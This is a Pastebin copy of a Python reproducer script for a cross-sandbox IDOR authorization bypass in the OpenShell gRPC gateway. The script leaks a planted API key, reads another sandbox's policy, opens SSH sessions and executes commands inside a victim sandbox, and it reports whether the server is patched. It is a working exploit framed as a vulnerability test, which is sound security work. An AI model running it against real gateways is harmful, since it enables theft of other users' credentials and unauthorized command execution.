Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- # SPDX-FileCopyrightText: Copyright (c) 2025-2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
- # SPDX-License-Identifier: Apache-2.0
- """
- Reproducer: Cross-Sandbox Authorization Bypass via IDOR
- =======================================================
- Product : NVIDIA OpenShell (openshell-server gRPC gateway)
- Version : 0.0.8-dev.5 (commit 925160e84, main branch)
- CWE : CWE-639 - Insecure Direct Object Reference
- CVSS : 7.7 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
- Vulnerability
- -------------
- Sandbox-scoped gRPC RPCs accept an arbitrary sandbox_id with no
- ownership or authorization check. All sandbox pods and the CLI share
- a single mTLS client certificate (CN=openshell-client), so the server
- cannot distinguish callers at the TLS layer. This allows any sandbox
- (or any holder of the shared cert) to:
- - Read another sandbox's provider credentials (API keys) via
- GetSandboxProviderEnvironment
- - Read another sandbox's policy via GetSandboxPolicy
- - Create SSH sessions into another sandbox via CreateSshSession
- - Execute arbitrary commands inside another sandbox via ExecSandbox
- The impact is amplified by the optional unauthenticated edge mode
- where no mTLS is required at all.
- What this script tests
- ----------------------
- The script creates two sandboxes: a VICTIM (with a secret API key)
- and an ATTACKER (separate, no provider). It then calls sandbox-scoped
- RPCs using the victim's sandbox_id from the attacker's perspective
- (the same mTLS connection, no per-sandbox authorization token).
- Tested RPCs:
- 1. GetSandboxProviderEnvironment - no token (attacker reads victim creds)
- 2. GetSandboxProviderEnvironment - fabricated token against victim
- 3. GetSandboxPolicy - no token (attacker reads victim policy)
- 4. CreateSshSession - no token (attacker gets SSH into victim)
- 5. ExecSandbox - no token (attacker runs commands in victim)
- Tests 1-3 target RPCs that were hardened by the fix (should reject on
- patched servers). Tests 4-5 target write-side RPCs (CreateSshSession,
- ExecSandbox) which remain unprotected at the time of writing.
- Tests 4-5 require the sandbox pod to be in Ready phase. Use --wait-ready
- to poll until the sandbox controller has provisioned the pod (default
- timeout: 120s). Without --wait-ready, write-side tests will be
- INCONCLUSIVE if pods are not yet running.
- Limitations
- -----------
- Legacy sandbox caveat: The patched server's validate_sandbox_token()
- allows unrestricted access to sandboxes whose sandbox_token_hash is
- empty (created before token enforcement). This script only creates
- fresh sandboxes, which always receive a token hash, so it cannot
- exercise that legacy compatibility path. A "FIXED" result here does
- not prove legacy sandboxes are protected.
- Test 2 uses a fabricated UUID-format token, not the attacker sandbox's
- real OPENSHELL_SANDBOX_TOKEN. The real token is only available inside
- the attacker's pod (injected as an environment variable during pod
- creation) and is not returned by the CreateSandbox API. A full cross-
- sandbox token replay test would require exec'ing into the attacker pod
- to retrieve it. On unpatched servers this distinction is irrelevant
- since no token validation exists. On patched servers, the fabricated
- token still proves the server rejects non-matching tokens, but would
- not catch a hypothetical regression that accepts any valid-for-some-
- sandbox token.
- Tests 4-5 (CreateSshSession, ExecSandbox) will be INCONCLUSIVE when
- the sandbox pod is not actually running, because the server rejects
- with FAILED_PRECONDITION before reaching any authorization logic.
- Use --wait-ready to wait for pod provisioning. The absence of
- validate_sandbox_token() in both handlers is confirmed by source
- inspection (see grpc.rs create_ssh_session and exec_sandbox).
- Error classification: Tests 1-3 only count UNAUTHENTICATED or
- PERMISSION_DENIED as proof that the authorization fix is active.
- Any other gRPC error (NOT_FOUND, INTERNAL, UNAVAILABLE, etc.) is
- recorded as INCONCLUSIVE to avoid false confidence from transport
- or unrelated server failures.
- Prerequisites
- -------------
- 1. A running OpenShell gateway (openshell gateway start)
- 2. Python 3.10+ with grpcio and protobuf
- 3. Generated proto stubs in python/openshell/_proto/
- 4. mTLS certs at ~/.config/openshell/gateways/<gateway>/mtls/
- Usage
- -----
- Read-side tests only (fast, no pod wait):
- PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py
- Full test including write-side (waits for pod provisioning):
- PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
- --wait-ready
- With custom endpoint, gateway name, or timeout:
- PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
- --wait-ready --ready-timeout 180 --endpoint 127.0.0.1:8080 --gateway openshell
- PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
- --plaintext --endpoint 127.0.0.1:9090
- Expected results
- ----------------
- VULNERABLE (unpatched): All tests return data - API keys leaked,
- SSH session created, commands executed,
- policy disclosed.
- FIXED (patched): Tests 1-3 are rejected with UNAUTHENTICATED
- or PERMISSION_DENIED. Tests 4-5 may still
- succeed (CreateSshSession and ExecSandbox
- are not yet gated).
- Note: "FIXED" only covers fresh sandboxes.
- Legacy sandboxes with empty token hashes
- are still allowed through by the patch.
- """
- from __future__ import annotations
- import argparse
- import pathlib
- import sys
- import time
- import grpc
- from openshell._proto import (
- datamodel_pb2,
- openshell_pb2,
- openshell_pb2_grpc,
- sandbox_pb2,
- )
- def parse_args() -> argparse.Namespace:
- p = argparse.ArgumentParser(
- description="Reproduce cross-sandbox authorization bypass in OpenShell gateway",
- )
- p.add_argument(
- "--endpoint",
- default="127.0.0.1:8080",
- help="Gateway gRPC endpoint (default: 127.0.0.1:8080)",
- )
- p.add_argument(
- "--gateway",
- default="openshell",
- help="Gateway name for mTLS cert lookup (default: openshell)",
- )
- p.add_argument(
- "--plaintext",
- action="store_true",
- help="Use insecure plaintext channel (skip mTLS)",
- )
- p.add_argument(
- "--wait-ready",
- action="store_true",
- help="Wait for victim sandbox pod to reach Ready before running "
- "write-side tests (CreateSshSession, ExecSandbox). Without this "
- "flag, write-side tests may be INCONCLUSIVE.",
- )
- p.add_argument(
- "--ready-timeout",
- type=int,
- default=120,
- help="Seconds to wait for sandbox Ready when --wait-ready is set "
- "(default: 120)",
- )
- return p.parse_args()
- def make_channel(args: argparse.Namespace) -> grpc.Channel:
- if args.plaintext:
- return grpc.insecure_channel(args.endpoint)
- mtls_dir = (
- pathlib.Path.home()
- / ".config"
- / "openshell"
- / "gateways"
- / args.gateway
- / "mtls"
- )
- ca_pem = (mtls_dir / "ca.crt").read_bytes()
- cert_pem = (mtls_dir / "tls.crt").read_bytes()
- key_pem = (mtls_dir / "tls.key").read_bytes()
- credentials = grpc.ssl_channel_credentials(
- root_certificates=ca_pem,
- private_key=key_pem,
- certificate_chain=cert_pem,
- )
- return grpc.secure_channel(args.endpoint, credentials)
- def delete_quietly(stub, name: str, kind: str) -> None:
- try:
- if kind == "sandbox":
- stub.DeleteSandbox(openshell_pb2.DeleteSandboxRequest(name=name))
- elif kind == "provider":
- stub.DeleteProvider(openshell_pb2.DeleteProviderRequest(name=name))
- except grpc.RpcError:
- pass
- def _default_policy() -> sandbox_pb2.SandboxPolicy:
- return sandbox_pb2.SandboxPolicy(
- version=1,
- filesystem=sandbox_pb2.FilesystemPolicy(
- include_workdir=True,
- read_only=["/usr", "/lib", "/etc"],
- read_write=["/sandbox", "/tmp"],
- ),
- process=sandbox_pb2.ProcessPolicy(
- run_as_user="sandbox",
- run_as_group="sandbox",
- ),
- )
- def wait_for_sandbox_ready(
- stub, sandbox_id: str, timeout: int = 120, poll_interval: int = 3,
- ) -> bool:
- """Poll CreateSshSession until sandbox is Ready or timeout expires.
- Returns True if sandbox reached Ready, False on timeout. We use
- CreateSshSession as the probe because it returns FAILED_PRECONDITION
- when the sandbox phase is not Ready, and succeeds (or returns an
- authz error) when it is.
- """
- deadline = time.monotonic() + timeout
- attempt = 0
- while time.monotonic() < deadline:
- attempt += 1
- try:
- resp = stub.CreateSshSession(
- openshell_pb2.CreateSshSessionRequest(sandbox_id=sandbox_id)
- )
- stub.RevokeSshSession(
- openshell_pb2.RevokeSshSessionRequest(token=resp.token)
- )
- return True
- except grpc.RpcError as e:
- if e.code() == grpc.StatusCode.FAILED_PRECONDITION:
- remaining = int(deadline - time.monotonic())
- print(f" [{attempt}] Sandbox not ready, {remaining}s remaining...")
- time.sleep(poll_interval)
- elif e.code() in (
- grpc.StatusCode.UNAUTHENTICATED,
- grpc.StatusCode.PERMISSION_DENIED,
- ):
- return True
- else:
- print(f" [{attempt}] Unexpected: {e.code().name}: {e.details()}")
- time.sleep(poll_interval)
- return False
- AUTHZ_CODES = frozenset({
- grpc.StatusCode.UNAUTHENTICATED,
- grpc.StatusCode.PERMISSION_DENIED,
- })
- class Result:
- def __init__(self):
- self.vulnerable = 0
- self.fixed = 0
- self.inconclusive = 0
- self.entries: list[tuple[str, str, str]] = []
- def record(self, test: str, status: str, detail: str) -> None:
- self.entries.append((test, status, detail))
- if status == "VULNERABLE":
- self.vulnerable += 1
- elif status == "FIXED":
- self.fixed += 1
- else:
- self.inconclusive += 1
- def record_rpc_error(self, test: str, e: grpc.RpcError) -> None:
- """Classify an RPC error as FIXED or INCONCLUSIVE.
- Only UNAUTHENTICATED and PERMISSION_DENIED indicate the
- authorization check actually fired. Any other error (NOT_FOUND,
- INTERNAL, UNAVAILABLE, etc.) is ambiguous and recorded as
- INCONCLUSIVE to avoid false confidence.
- """
- detail = f"{e.code().name}: {e.details()}"
- if e.code() in AUTHZ_CODES:
- print(f"\n [OK] REJECTED by authorization - {detail}")
- self.record(test, "FIXED", detail)
- else:
- print(f"\n [??] INCONCLUSIVE - non-authz error")
- print(f" {detail}")
- self.record(test, "INCONCLUSIVE", detail)
- def main() -> int:
- args = parse_args()
- channel = make_channel(args)
- stub = openshell_pb2_grpc.OpenShellStub(channel)
- try:
- stub.Health(openshell_pb2.HealthRequest(), timeout=10)
- except grpc.RpcError as e:
- print(f"[!] Cannot reach gateway at {args.endpoint}: {e}", file=sys.stderr)
- return 1
- print(f"[+] Connected to gateway at {args.endpoint}")
- SECRET_KEY = "sk-ant-SUPER-SECRET-KEY-12345"
- VICTIM_PROVIDER = "repro-victim-provider"
- VICTIM_SANDBOX = "repro-victim-sandbox"
- ATTACKER_SANDBOX = "repro-attacker-sandbox"
- result = Result()
- try:
- # =================================================================
- # SETUP: Victim provider + sandbox (has secrets)
- # =================================================================
- delete_quietly(stub, VICTIM_PROVIDER, "provider")
- stub.CreateProvider(
- openshell_pb2.CreateProviderRequest(
- provider=datamodel_pb2.Provider(
- name=VICTIM_PROVIDER,
- type="claude",
- credentials={"ANTHROPIC_API_KEY": SECRET_KEY},
- )
- )
- )
- print(f"[+] Created victim provider '{VICTIM_PROVIDER}'")
- print(f" Secret: {SECRET_KEY}")
- delete_quietly(stub, VICTIM_SANDBOX, "sandbox")
- victim_resp = stub.CreateSandbox(
- openshell_pb2.CreateSandboxRequest(
- name=VICTIM_SANDBOX,
- spec=datamodel_pb2.SandboxSpec(
- policy=_default_policy(),
- providers=[VICTIM_PROVIDER],
- ),
- )
- )
- victim_id = victim_resp.sandbox.id
- print(f"[+] Created victim sandbox '{VICTIM_SANDBOX}' (id: {victim_id})")
- # =================================================================
- # SETUP: Attacker sandbox (no provider, separate identity)
- # =================================================================
- delete_quietly(stub, ATTACKER_SANDBOX, "sandbox")
- attacker_resp = stub.CreateSandbox(
- openshell_pb2.CreateSandboxRequest(
- name=ATTACKER_SANDBOX,
- spec=datamodel_pb2.SandboxSpec(policy=_default_policy()),
- )
- )
- attacker_id = attacker_resp.sandbox.id
- print(f"[+] Created attacker sandbox '{ATTACKER_SANDBOX}' (id: {attacker_id})")
- print()
- # =================================================================
- # TEST 1: GetSandboxProviderEnvironment - no token
- #
- # Attacker uses the shared mTLS cert to read the victim's
- # provider credentials without any per-sandbox token.
- # =================================================================
- print("=" * 64)
- print("TEST 1: GetSandboxProviderEnvironment - no token")
- print(f" caller context = attacker (shared mTLS cert)")
- print(f" target = victim sandbox {victim_id}")
- print(f" x-sandbox-token = (none)")
- print("=" * 64)
- try:
- env_resp = stub.GetSandboxProviderEnvironment(
- openshell_pb2.GetSandboxProviderEnvironmentRequest(
- sandbox_id=victim_id,
- )
- )
- env = dict(env_resp.environment)
- leaked = env.get("ANTHROPIC_API_KEY", "")
- detail = f"leaked ANTHROPIC_API_KEY={leaked}"
- print(f"\n [!!] VULNERABLE - {detail}")
- result.record("GetSandboxProviderEnvironment (no token)", "VULNERABLE", detail)
- except grpc.RpcError as e:
- result.record_rpc_error("GetSandboxProviderEnvironment (no token)", e)
- # =================================================================
- # TEST 2: GetSandboxProviderEnvironment - fabricated token
- #
- # Submits a UUID-format token that is not valid for any
- # sandbox. On unpatched servers, the header is ignored and
- # credentials are returned. On patched servers, the token
- # hash won't match and the call is rejected.
- #
- # NOTE: This is NOT a real cross-sandbox token replay.
- # The attacker's real OPENSHELL_SANDBOX_TOKEN is only
- # available inside the attacker pod and cannot be obtained
- # through the API. See the Limitations section in the
- # docstring for details.
- # =================================================================
- print()
- print("=" * 64)
- print("TEST 2: GetSandboxProviderEnvironment - fabricated token")
- print(f" caller context = attacker (shared mTLS cert)")
- print(f" target = victim sandbox {victim_id}")
- print(f" x-sandbox-token = (fabricated UUID, not valid for any sandbox)")
- print("=" * 64)
- fabricated_token = f"aaaaaaaa-bbbb-cccc-dddd-{attacker_id[:12]}"
- try:
- env_resp = stub.GetSandboxProviderEnvironment(
- openshell_pb2.GetSandboxProviderEnvironmentRequest(
- sandbox_id=victim_id,
- ),
- metadata=[("x-sandbox-token", fabricated_token)],
- )
- env = dict(env_resp.environment)
- leaked = env.get("ANTHROPIC_API_KEY", "")
- detail = f"leaked ANTHROPIC_API_KEY={leaked}"
- print(f"\n [!!] VULNERABLE - {detail}")
- result.record("GetSandboxProviderEnvironment (fabricated token)", "VULNERABLE", detail)
- except grpc.RpcError as e:
- result.record_rpc_error("GetSandboxProviderEnvironment (fabricated token)", e)
- # =================================================================
- # TEST 3: GetSandboxPolicy - no token
- #
- # Attacker reads the victim's sandbox policy configuration.
- # GetSandboxPolicyRequest lives in sandbox_pb2 (not openshell_pb2).
- # =================================================================
- print()
- print("=" * 64)
- print("TEST 3: GetSandboxPolicy - no token")
- print(f" caller context = attacker (shared mTLS cert)")
- print(f" target = victim sandbox {victim_id}")
- print(f" x-sandbox-token = (none)")
- print("=" * 64)
- try:
- policy_resp = stub.GetSandboxPolicy(
- sandbox_pb2.GetSandboxPolicyRequest(
- sandbox_id=victim_id,
- )
- )
- detail = f"policy version {policy_resp.version} disclosed"
- print(f"\n [!!] VULNERABLE - {detail}")
- result.record("GetSandboxPolicy (no token)", "VULNERABLE", detail)
- except grpc.RpcError as e:
- result.record_rpc_error("GetSandboxPolicy (no token)", e)
- # =================================================================
- # WRITE-SIDE TESTS: require sandbox pod to be Ready
- #
- # CreateSshSession and ExecSandbox check sandbox phase before
- # doing anything, so they return FAILED_PRECONDITION when the
- # pod is not running. With --wait-ready, we poll until the
- # sandbox controller has provisioned the pod.
- # =================================================================
- victim_ready = False
- if args.wait_ready:
- print()
- print("=" * 64)
- print(f"WAITING for victim sandbox to reach Ready "
- f"(timeout {args.ready_timeout}s)")
- print("=" * 64)
- victim_ready = wait_for_sandbox_ready(
- stub, victim_id, timeout=args.ready_timeout,
- )
- if victim_ready:
- print(" Victim sandbox is Ready.")
- else:
- print(" Timed out. Write-side tests will be INCONCLUSIVE.")
- else:
- print()
- print("[*] Skipping sandbox Ready wait (use --wait-ready to enable)")
- # =================================================================
- # TEST 4: CreateSshSession - no token
- #
- # Attacker creates an SSH session into the victim's sandbox.
- # At the time of writing, CreateSshSession does NOT call
- # validate_sandbox_token(), so this RPC remains unprotected
- # even after the read-side fix.
- #
- # Source: crates/openshell-server/src/grpc.rs, fn create_ssh_session
- # =================================================================
- print()
- print("=" * 64)
- print("TEST 4: CreateSshSession - no token")
- print(f" caller context = attacker (shared mTLS cert)")
- print(f" target = victim sandbox {victim_id}")
- print(f" x-sandbox-token = (none)")
- print("=" * 64)
- try:
- ssh_resp = stub.CreateSshSession(
- openshell_pb2.CreateSshSessionRequest(
- sandbox_id=victim_id,
- )
- )
- detail = (
- f"SSH session token issued: {ssh_resp.token[:16]}... "
- f"(host={ssh_resp.gateway_host}:{ssh_resp.gateway_port})"
- )
- print(f"\n [!!] VULNERABLE - {detail}")
- result.record("CreateSshSession (no token)", "VULNERABLE", detail)
- stub.RevokeSshSession(
- openshell_pb2.RevokeSshSessionRequest(token=ssh_resp.token)
- )
- except grpc.RpcError as e:
- detail = f"{e.code().name}: {e.details()}"
- if e.code() in AUTHZ_CODES:
- print(f"\n [OK] REJECTED by authorization - {detail}")
- result.record("CreateSshSession (no token)", "FIXED", detail)
- elif e.code() == grpc.StatusCode.FAILED_PRECONDITION:
- print(f"\n [??] INCONCLUSIVE - sandbox pod not running")
- print(f" {detail}")
- if not args.wait_ready:
- print(f" Re-run with --wait-ready to wait for pod provisioning.")
- result.record("CreateSshSession (no token)", "INCONCLUSIVE", detail)
- else:
- print(f"\n [??] INCONCLUSIVE - non-authz error")
- print(f" {detail}")
- result.record("CreateSshSession (no token)", "INCONCLUSIVE", detail)
- # =================================================================
- # TEST 5: ExecSandbox - no token
- #
- # Attacker runs a command inside the victim's sandbox.
- # ExecSandbox does NOT call validate_sandbox_token(), so this
- # RPC remains unprotected even after the read-side fix.
- #
- # Source: crates/openshell-server/src/grpc.rs, fn exec_sandbox
- # =================================================================
- print()
- print("=" * 64)
- print("TEST 5: ExecSandbox - no token")
- print(f" caller context = attacker (shared mTLS cert)")
- print(f" target = victim sandbox {victim_id}")
- print(f" x-sandbox-token = (none)")
- exec_cmd = ["hostname"]
- print(f" command = {exec_cmd}")
- print(f" expected output = '{VICTIM_SANDBOX}' (victim pod name)")
- print("=" * 64)
- try:
- events = stub.ExecSandbox(
- openshell_pb2.ExecSandboxRequest(
- sandbox_id=victim_id,
- command=exec_cmd,
- )
- )
- output_parts = []
- exit_code = None
- for event in events:
- which = event.WhichOneof("payload")
- if which == "stdout":
- output_parts.append(
- event.stdout.data.decode("utf-8", errors="replace")
- )
- elif which == "stderr":
- output_parts.append(
- event.stderr.data.decode("utf-8", errors="replace")
- )
- elif which == "exit":
- exit_code = event.exit.exit_code
- output = "".join(output_parts).strip()
- is_victim = output == VICTIM_SANDBOX
- marker = "CONFIRMS victim sandbox" if is_victim else "unexpected hostname"
- detail = f"hostname='{output}' ({marker}, exit {exit_code})"
- print(f"\n [!!] VULNERABLE - {detail}")
- result.record("ExecSandbox (no token)", "VULNERABLE", detail)
- except grpc.RpcError as e:
- detail = f"{e.code().name}: {e.details()}"
- if e.code() in AUTHZ_CODES:
- print(f"\n [OK] REJECTED by authorization - {detail}")
- result.record("ExecSandbox (no token)", "FIXED", detail)
- elif e.code() == grpc.StatusCode.FAILED_PRECONDITION:
- print(f"\n [??] INCONCLUSIVE - sandbox pod not running")
- print(f" {detail}")
- if not args.wait_ready:
- print(f" Re-run with --wait-ready to wait for pod provisioning.")
- result.record("ExecSandbox (no token)", "INCONCLUSIVE", detail)
- else:
- print(f"\n [??] INCONCLUSIVE - non-authz error")
- print(f" {detail}")
- result.record("ExecSandbox (no token)", "INCONCLUSIVE", detail)
- # =================================================================
- # SUMMARY
- # =================================================================
- print()
- print("=" * 64)
- print("RESULTS")
- print("=" * 64)
- total = len(result.entries)
- print(f" Tests run: {total}")
- print(f" Vulnerable: {result.vulnerable}")
- print(f" Fixed: {result.fixed}")
- print(f" Inconclusive: {result.inconclusive}")
- print()
- for test, status, detail in result.entries:
- tags = {
- "VULNERABLE": "[!!]",
- "FIXED": "[OK]",
- "INCONCLUSIVE": "[??]",
- }
- tag = tags.get(status, "[--]")
- print(f" {tag} {test}")
- print(f" {detail}")
- print()
- if result.vulnerable > 0:
- print(" CONCLUSION: Authorization bypass CONFIRMED. (exit 2)")
- print(" Cross-sandbox credential exfiltration is possible.")
- elif result.inconclusive > 0:
- print(" CONCLUSION: Read-side RPCs appear fixed, but some tests")
- print(" returned non-authz errors or could not be validated.")
- print(" Review INCONCLUSIVE entries above. (exit 1)")
- else:
- print(" CONCLUSION: All tested RPCs rejected unauthorized access")
- print(" with explicit authz errors. (exit 0)")
- finally:
- delete_quietly(stub, ATTACKER_SANDBOX, "sandbox")
- delete_quietly(stub, VICTIM_SANDBOX, "sandbox")
- delete_quietly(stub, VICTIM_PROVIDER, "provider")
- print("\n[+] Cleanup complete")
- channel.close()
- if result.vulnerable > 0:
- return 2
- if result.inconclusive > 0:
- return 1
- return 0
- if __name__ == "__main__":
- raise SystemExit(main())
Advertisement